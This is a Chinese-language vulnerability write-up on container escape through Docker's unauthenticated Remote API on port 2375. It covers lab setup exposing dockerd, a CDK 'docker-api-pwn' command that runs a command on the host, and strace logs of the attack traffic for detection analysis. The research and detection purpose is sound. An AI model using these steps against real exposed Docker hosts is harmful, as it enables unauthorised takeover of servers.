Docker Remote API 逃逸攻击(2375端口)
一、漏洞简介
Docker 2375端口上的 Remote API 存在未授权访问漏洞,攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸。
二、前置知识
Docker 远程管理端口
为了实现集群管理,Docker提供了远程管理接口。Docker Daemon作为守护进程,运行在后台,可以执行发送到管理接口上的Docker命令。正是因为错误地使用了Docker远端接口,引起了安全漏洞,因此在启动Docker Daemon时,加入-H 0.0.0.0:2375,Docker Daemon就可以接收远端的Docker Client发送的指令。Docker是把2375端口作为非加密端口暴露出来,一般是用在测试环境中。此时,没有任何加密和认证过程,只要知道Docker主机的IP,任何人都可以管理这台主机上的容器和镜像。
三、漏洞利用路径
- 检查2375端口:向宿主机2375端口发送HTTP GET请求/info
- 准备恶意容器镜像:向宿主机2375端口发送HTTP POST请求/images/create
- 实施攻击:向宿主机2375端口发送HTTP POST请求,分别用/containers/create和/containers//start创建并启动恶意活动容器,其中容器配置通过JSON在create构造
四、漏洞复现
环境搭建
- ubuntu 20.04
- docker 23.0.2
打开docker远程访问API:
- 打开
/usr/lib/systemd/system/docker.service
文件,在[service]
的ExeStart=...
后面追加:
-H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
即:ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
- 重启生效
systemctl daemon-reload # 重新加载配置文件
systemctl restart docker
运行攻击容器:
docker run --rm -it --name=docker-api-pwn -v /root/cdk:/cdk ubuntu:20.04 bash
利用:
# in container
./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn" #ip地址改为宿主机地址或在创建容器时使用host网络
ls /tmp/docker-api-pwn
效果:宿主机上出现/tmp/docker-api-pwn文件,完成远程任意命令执行,逃逸成功。
五、漏洞行为数据分析
-
检查Docker Remote API是否开启。
264 01:39:19.448323 rt_sigreturn({mask=[]}) = 3 <0.000016> 264 01:39:19.448394 socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 3 <0.000020> 264 01:39:19.448443 connect(3, {sa_family=AF_INET, sin_port=htons(2375), sin_addr=inet_addr("172.31.102.241")}, 16) = -1 EINPROGRESS (Operation now in progress) <0.000269> 264 01:39:19.448791 epoll_ctl(4, EPOLL_CTL_ADD, 3, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=293859544, u64=140458609340632}}) = 0 <0.000010> 264 01:39:19.448845 epoll_pwait(4, [{EPOLLOUT, {u32=293859544, u64=140458609340632}}], 128, 0, NULL, 0) = 1 <0.000017> 264 01:39:19.448922 getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0 <0.000009> 264 01:39:19.448962 getpeername(3, {sa_family=AF_INET, sin_port=htons(2375), sin_addr=inet_addr("172.31.102.241")}, [112->16]) = 0 <0.000009> 264 01:39:19.449007 getsockname(3, {sa_family=AF_INET, sin_port=htons(40088), sin_addr=inet_addr("172.17.0.4")}, [112->16]) = 0 <0.000009> 264 01:39:19.449049 setsockopt(3, SOL_TCP, TCP_NODELAY, [1], 4) = 0 <0.000009> 264 01:39:19.449085 setsockopt(3, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0 <0.000009> 264 01:39:19.449120 setsockopt(3, SOL_TCP, TCP_KEEPINTVL, [30], 4) = 0 <0.000009> 264 01:39:19.449156 setsockopt(3, SOL_TCP, TCP_KEEPIDLE, [30], 4) = 0 <0.000009> 264 01:39:19.449263 read(3, 0xc0001a8000, 4096) = -1 EAGAIN (Resource temporarily unavailable) <0.000010> 264 01:39:19.449352 write(3, "GET /info HTTP/1.1\r\nHost: 172.31"..., 136) = 136 <0.004713> 264 01:39:19.454111 epoll_pwait(4, [], 128, 0, NULL, 0) = 0 <0.000009> 264 01:39:19.454152 epoll_pwait(4, <unfinished ...> 265 01:39:19.458155 <... nanosleep resumed>NULL) = 0 <0.010050> 265 01:39:19.458187 futex(0xe91c20, FUTEX_WAIT_PRIVATE, 0, {tv_sec=60, tv_nsec=0} <unfinished ...> 264 01:39:19.471125 <... epoll_pwait resumed>[{EPOLLIN|EPOLLOUT, {u32=293859544, u64=140458609340632}}], 128, -1, NULL, 0) = 1 <0.016960> 264 01:39:19.471182 futex(0xe91c20, FUTEX_WAKE_PRIVATE, 1) = 1 <0.000012> 265 01:39:19.471213 <... futex resumed>) = 0 <0.013009> 265 01:39:19.471229 sched_yield() = 0 <0.000010> 265 01:39:19.471261 futex(0xe91b38, FUTEX_WAIT_PRIVATE, 2, NULL <unfinished ...> 264 01:39:19.471284 futex(0xe91b38, FUTEX_WAKE_PRIVATE, 1) = 1 <0.000011> 265 01:39:19.471311 <... futex resumed>) = 0 <0.000040> 265 01:39:19.471326 futex(0xe91b38, FUTEX_WAKE_PRIVATE, 1) = 0 <0.000019> 265 01:39:19.471367 epoll_pwait(4, [], 128, 0, NULL, 0) = 0 <0.000007> 265 01:39:19.471398 nanosleep({tv_sec=0, tv_nsec=20000}, <unfinished ...> 264 01:39:19.471426 read(3, "HTTP/1.1 200 OK\r\nApi-Version: 1."..., 4096) = 2793 <0.000014>
-
向Docker Remote API发送构造好的恶意HTTP数据包,创建一个带不安全挂载的恶意容器。*
264 01:39:26.915419 write(3, "POST /containers/create HTTP/1.1"..., 522 <unfinished ...> 265 01:39:26.915457 <... nanosleep resumed>NULL) = 0 <0.000183> 264 01:39:26.915475 <... write resumed>) = 522 <0.000041>
-
启动恶意容器,执行指定命令,实现逃逸。
264 01:39:27.331880 write(3, "POST /containers/4da26d930eeb36b"..., 233 <unfinished ...> 265 01:39:27.331909 <... nanosleep resumed>NULL) = 0 <0.000164> 264 01:39:27.331928 <... write resumed>) = 233 <0.000033>
六、总结
本文分析了如何通过 Docker 远程管理API来完成逃逸,但该漏洞需要管理员主动配置,没有广泛存在,但利用难度很低。